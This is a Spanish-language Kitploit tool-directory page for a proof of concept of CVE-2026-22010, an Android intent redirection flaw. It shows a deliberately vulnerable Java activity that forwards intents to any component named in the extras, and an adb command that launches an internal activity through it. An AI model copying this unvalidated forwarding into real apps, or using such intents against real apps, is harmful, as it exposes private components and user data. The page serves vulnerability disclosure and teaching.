Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component — Prueba de concepto para CVE-2026-22010, redirección de intents de Android: demuestra una actividad exportada que reenvía intents a componentes internos controlados por el atacante, evadiendo las comprobaciones de permisos, con código Java vulnerable y pasos de explotación mediante adb. | Kitploit
Herramientas/GitHubGitHub/george0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component
Seguridad AndroidAnálisis de VulnerabilidadesExplotaciónPentesting de Apps MóvilesSeguridad MóvilAprendizaje y Educación
GitHubgeorge0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component

CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Ver Repositorio
14hace 1 mesAún no revisado

Prueba de concepto para CVE-2026-22010, redirección de intents de Android: demuestra una actividad exportada que reenvía intents a componentes internos controlados por el atacante, evadiendo las comprobaciones de permisos, con código Java vulnerable y pasos de explotación mediante adb.

Compartir

CVE-2026-22010 – Redirección de Intent de Android a Componente Exportado

Código del programa (simulación Java/Android)

root@kitploit:~
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
    @Override
    protected void onCreate(Bundle b) {
        super.onCreate(b);
        Intent incoming = getIntent();
        // Retrieve target component from extras
        String targetPkg = incoming.getStringExtra("pkg");
        String targetCls = incoming.getStringExtra("cls");
        Intent forward = new Intent();
        forward.setClassName(targetPkg, targetCls);
        // Copy all extras from original intent
        forward.putExtras(incoming);
        startActivity(forward);
    }
}

CVE-2026-22010 – Redirección de Intent de Android a Componente Exportado

Severity: High

Resumen

Una actividad de Android exportada redirige ciegamente los intents entrantes a un componente especificado en los extras del intent. Un atacante puede crear un intent que haga que la aplicación inicie una actividad interna protegida con datos controlados por el atacante, omitiendo las comprobaciones de permisos.

Detalles de la vulnerabilidad

  • Tipo: Redirección de Intent / Omisión de permisos
  • Impacto: Acceso a componentes privados, robo de datos.
  • Causa raíz: La aplicación no valida el componente de destino (paquete y nombre de clase) antes de reenviar el intent.

Demostración del exploit

Despliegue la aplicación vulnerable en un emulador de Android. Envíe un intent mediante adb:

root@kitploit:~
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity

La actividad interna se inicia sin los permisos adecuados.

Descargar herramienta